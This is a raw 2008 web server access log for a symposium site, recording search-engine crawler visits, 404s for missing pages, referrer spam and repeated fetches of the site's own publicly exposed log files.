208.111.154.9 - - [09/Oct/2008:23:51:36 -0400] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.27 - - [10/Oct/2008:00:17:52 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 www.geil-symposium.com
74.6.18.250 - - [10/Oct/2008:00:18:03 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.250 - - [10/Oct/2008:00:18:03 -0400] "GET /logs/access.log HTTP/1.0" 200 174916 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.9 - - [10/Oct/2008:01:20:46 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.9 - - [10/Oct/2008:01:20:47 -0400] "GET /Registration.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
80.77.80.253 - - [10/Oct/2008:01:54:09 -0400] "GET http://www.geil-symposium.com/publications.html HTTP/1.1" 404 - "-" "-" 0 www.geil-symposium.com
84.153.73.59 - - [10/Oct/2008:07:41:03 -0400] "GET / HTTP/1.0" 200 314 "VerdachtVergehennachUrhG.com" "Verdacht Vergehen nach UrhG" 0 www.geil-symposium.com
79.118.199.223 - - [10/Oct/2008:07:55:35 -0400] "GET /logs/access.log HTTP/1.1" 200 175801 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 1 www.geil-symposium.com
65.55.209.25 - - [10/Oct/2008:08:34:07 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.209.25 - - [10/Oct/2008:08:34:07 -0400] "GET / HTTP/1.1" 200 326 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
208.111.154.9 - - [10/Oct/2008:11:04:24 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.9 - - [10/Oct/2008:11:04:25 -0400] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [10/Oct/2008:12:32:58 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.121 - - [10/Oct/2008:12:39:09 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.121 - - [10/Oct/2008:12:39:10 -0400] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.121 - - [10/Oct/2008:12:39:10 -0400] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.71.116 - - [10/Oct/2008:17:18:19 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [10/Oct/2008:17:18:19 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.116 - - [10/Oct/2008:19:06:20 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
193.47.80.36 - - [11/Oct/2008:00:04:38 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [11/Oct/2008:00:04:38 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
207.210.94.74 - - [11/Oct/2008:03:11:10 -0400] "GET / HTTP/1.1" 200 326 "http://www.omget.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
64.41.145.68 - - [11/Oct/2008:09:00:43 -0400] "GET /logs/access.log HTTP/1.0" 200 178520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 9 www.geil-symposium.com
195.189.226.215 - - [11/Oct/2008:10:49:54 -0400] "GET /logs/error.log HTTP/1.1" 200 114181 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 1 www.geil-symposium.com
195.189.226.215 - - [11/Oct/2008:10:51:34 -0400] "GET /logs/error.log HTTP/1.1" 200 114181 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 1 www.geil-symposium.com
83.133.125.202 - - [11/Oct/2008:12:15:15 -0400] "GET / HTTP/1.1" 200 326 "http://www.BigFinder.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)" 1 www.geil-symposium.com
83.133.125.202 - - [11/Oct/2008:12:15:15 -0400] "GET / HTTP/1.0" 200 314 "-" "-" 0 www.geil-symposium.com
83.133.125.202 - - [11/Oct/2008:12:15:15 -0400] "GET / HTTP/1.0" 200 314 "-" "-" 0 www.geil-symposium.com
74.6.17.157 - - [11/Oct/2008:12:30:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.157 - - [11/Oct/2008:12:30:16 -0400] "GET /logs/error.log HTTP/1.0" 200 114416 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
38.99.13.124 - - [11/Oct/2008:13:06:17 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.17.157 - - [11/Oct/2008:15:03:00 -0400] "GET /Venue.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
207.210.94.74 - - [11/Oct/2008:16:02:39 -0400] "GET / HTTP/1.1" 200 326 "http://www.omget.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
208.80.194.41 - - [11/Oct/2008:16:41:45 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={9EF074D9-E650-4421-A805-3BD757FACAB7})" 0 www.geil-symposium.com
220.181.61.192 - - [11/Oct/2008:18:20:07 -0400] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
66.249.71.116 - - [11/Oct/2008:23:05:59 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.116 - - [11/Oct/2008:23:05:59 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
202.160.178.85 - - [12/Oct/2008:00:54:34 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [12/Oct/2008:00:54:35 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 1 www.geil-symposium.com
202.108.7.214 - - [12/Oct/2008:00:57:26 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
202.108.7.214 - - [12/Oct/2008:00:57:26 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
195.189.226.215 - - [12/Oct/2008:05:29:31 -0400] "GET /logs/error.log HTTP/1.1" 200 115607 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 1 www.geil-symposium.com
74.6.22.177 - - [12/Oct/2008:05:30:29 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.177 - - [12/Oct/2008:05:30:29 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.40 - - [12/Oct/2008:09:57:21 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; HbTools 4.7.7; MEGAUPLOAD 1.0)" 0 www.geil-symposium.com
195.189.226.215 - - [12/Oct/2008:11:09:28 -0400] "GET /logs/error.log HTTP/1.1" 200 115842 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 1 www.geil-symposium.com
38.99.13.124 - - [12/Oct/2008:13:15:54 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
82.146.56.154 - - [12/Oct/2008:15:11:22 -0400] "GET /logs/error.log HTTP/1.1" 200 116079 "http://www.geil-symposium.com/logs/error.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 1 www.geil-symposium.com
79.112.149.34 - - [12/Oct/2008:15:22:53 -0400] "GET /logs/access.log HTTP/1.1" 200 183276 "-" "expsbjdq nb3ur hb33nptvukuSrqSojblrnk" 1 www.geil-symposium.com
74.6.17.157 - - [12/Oct/2008:16:47:01 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.157 - - [12/Oct/2008:16:47:02 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.71.115 - - [12/Oct/2008:17:09:13 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.71.117 - - [12/Oct/2008:17:09:13 -0400] "GET /images/candle1.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
64.246.161.30 - - [12/Oct/2008:23:13:49 -0400] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.161.30 - - [12/Oct/2008:23:13:49 -0400] "GET / HTTP/1.1" 200 326 "http://www.whois.sc/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
207.210.94.74 - - [12/Oct/2008:23:24:32 -0400] "GET / HTTP/1.1" 200 326 "http://www.gobluefly.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
207.210.94.74 - - [12/Oct/2008:23:24:32 -0400] "GET / HTTP/1.1" 200 326 "http://www.gobluefly.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
207.210.94.74 - - [12/Oct/2008:23:54:03 -0400] "GET / HTTP/1.1" 200 326 "http://www.camfleet.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
66.249.71.116 - - [13/Oct/2008:03:58:10 -0400] "GET /logs/error.log HTTP/1.1" 200 117283 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
79.112.149.49 - - [13/Oct/2008:04:22:44 -0400] "GET /logs/access.log HTTP/1.1" 200 185277 "-" "wvqttuajmqxfwqoubsuv" 1 www.geil-symposium.com
193.47.80.36 - - [13/Oct/2008:04:47:51 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [13/Oct/2008:04:47:51 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
207.210.94.74 - - [13/Oct/2008:10:06:01 -0400] "GET / HTTP/1.1" 200 326 "http://www.pornseed.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
79.112.149.49 - - [13/Oct/2008:12:14:48 -0400] "GET /logs/access.log HTTP/1.1" 200 185989 "-" "mqjkrvruil3itjdwlnkf" 1 www.geil-symposium.com
66.249.71.116 - - [13/Oct/2008:12:43:19 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.71.116 - - [13/Oct/2008:12:43:19 -0400] "GET /images/top_logoarea.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
38.99.13.124 - - [13/Oct/2008:13:52:06 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
89.89.224.76 - - [13/Oct/2008:17:18:51 -0400] "GET /logs/access.log HTTP/1.1" 200 186583 "http://www.bloglines.com/myblogs_display?sub=67350988&site=16153734" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 1 www.geil-symposium.com
89.89.224.76 - - [13/Oct/2008:17:18:52 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 0 www.geil-symposium.com
89.89.224.76 - - [13/Oct/2008:17:19:42 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 0 www.geil-symposium.com
89.89.224.76 - - [13/Oct/2008:17:20:01 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 0 www.geil-symposium.com
66.231.188.135 - - [13/Oct/2008:17:35:30 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" 0 www.geil-symposium.com
66.231.188.115 - - [13/Oct/2008:17:35:31 -0400] "GET / HTTP/1.0" 200 314 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" 0 www.geil-symposium.com
74.6.22.168 - - [13/Oct/2008:20:45:03 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.168 - - [13/Oct/2008:20:45:03 -0400] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.61.192 - - [14/Oct/2008:03:03:48 -0400] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
207.210.94.74 - - [14/Oct/2008:03:13:21 -0400] "GET / HTTP/1.1" 200 326 "http://www.camfleet.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
208.80.194.53 - - [14/Oct/2008:05:26:30 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322; ZangoToolbar 4.8.2)" 0 www.geil-symposium.com
89.89.224.76 - - [14/Oct/2008:08:56:45 -0400] "GET /logs/access.log HTTP/1.1" 200 188801 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 1 www.geil-symposium.com
89.89.224.76 - - [14/Oct/2008:08:56:48 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 0 www.geil-symposium.com
89.89.224.76 - - [14/Oct/2008:08:56:49 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17" 0 www.geil-symposium.com
79.112.149.111 - - [14/Oct/2008:09:00:14 -0400] "GET /logs/access.log HTTP/1.1" 200 189436 "-" "dnhhn9 rukguxphhinqx9qphHsi" 1 www.geil-symposium.com
202.179.180.45 - - [14/Oct/2008:14:40:33 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [14/Oct/2008:14:40:33 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
74.6.17.184 - - [14/Oct/2008:17:28:15 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.184 - - [14/Oct/2008:17:28:16 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.184 - - [14/Oct/2008:17:28:16 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
193.47.80.36 - - [14/Oct/2008:17:45:38 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [14/Oct/2008:17:45:38 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
67.195.37.105 - - [14/Oct/2008:23:20:55 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [14/Oct/2008:23:20:56 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [15/Oct/2008:01:24:43 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [15/Oct/2008:01:25:00 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
41.210.0.181 - - [15/Oct/2008:01:25:13 -0400] "GET /logs/access.log HTTP/1.1" 200 191647 "http://search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=y&vst=0&vf=txt&vm=p&fl=0&fr=yfp-t-501&p=wade+OR+tarloy+OR+%40yahoo.com+-419&vs=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 12 www.geil-symposium.com
66.34.204.26 - - [15/Oct/2008:02:35:03 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [15/Oct/2008:02:35:03 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [15/Oct/2008:02:35:03 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
67.195.37.105 - - [15/Oct/2008:03:38:32 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.71.115 - - [15/Oct/2008:05:05:16 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.71.115 - - [15/Oct/2008:05:05:17 -0400] "GET /images/AdvancedSurfaceMicroscopyLogo.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
208.80.194.31 - - [15/Oct/2008:09:26:39 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; SIMBAR={F07B0266-EF01-4d94-A00E-8FF4EDA54432})" 0 www.geil-symposium.com
66.249.71.117 - - [15/Oct/2008:11:06:23 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.115 - - [15/Oct/2008:11:06:23 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
207.210.94.74 - - [15/Oct/2008:11:27:57 -0400] "GET / HTTP/1.1" 200 326 "http://www.linux-compatible-computer-parts.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
66.231.188.115 - - [15/Oct/2008:13:02:43 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" 0 www.geil-symposium.com
66.231.188.115 - - [15/Oct/2008:13:02:44 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" 0 www.geil-symposium.com
38.99.13.124 - - [15/Oct/2008:13:39:39 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
207.210.94.74 - - [15/Oct/2008:17:39:17 -0400] "GET / HTTP/1.1" 200 326 "http://www.camfleet.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
207.210.94.74 - - [15/Oct/2008:17:39:17 -0400] "GET / HTTP/1.1" 200 326 "http://www.topexxx.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
207.210.94.74 - - [15/Oct/2008:17:39:17 -0400] "GET / HTTP/1.1" 200 326 "http://www.topexxx.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
207.210.94.74 - - [15/Oct/2008:17:39:17 -0400] "GET / HTTP/1.1" 200 326 "http://www.omget.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
207.210.94.74 - - [15/Oct/2008:17:39:17 -0400] "GET / HTTP/1.1" 200 326 "http://www.camfleet.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
38.99.13.124 - - [15/Oct/2008:22:36:57 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
193.47.80.36 - - [16/Oct/2008:02:25:26 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [16/Oct/2008:02:25:27 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
117.96.106.33 - - [16/Oct/2008:04:36:29 -0400] "GET /logs/access.log HTTP/1.1" 200 196082 "http://www.alltheweb.com/search?cat=web&cs=utf8&rys=0&itag=crv&_sb_lang=pref&q=win+%40yahoo.com.cn%2Ctxt%2Cmsn.com%2Ctxt%2C163.com%2Ctxt&o=10" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 16 www.geil-symposium.com
79.112.149.7 - - [16/Oct/2008:08:24:57 -0400] "GET /logs/access.log HTTP/1.1" 200 196400 "-" "DdnohkjygjnxrhyyoDtuh" 1 www.geil-symposium.com
208.80.194.38 - - [16/Oct/2008:11:08:50 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
66.249.71.116 - - [16/Oct/2008:12:26:56 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [16/Oct/2008:12:26:56 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [16/Oct/2008:12:52:53 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
203.209.252.68 - - [16/Oct/2008:14:39:48 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [16/Oct/2008:14:39:49 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.179.180.45 - - [16/Oct/2008:19:51:52 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [16/Oct/2008:19:51:56 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
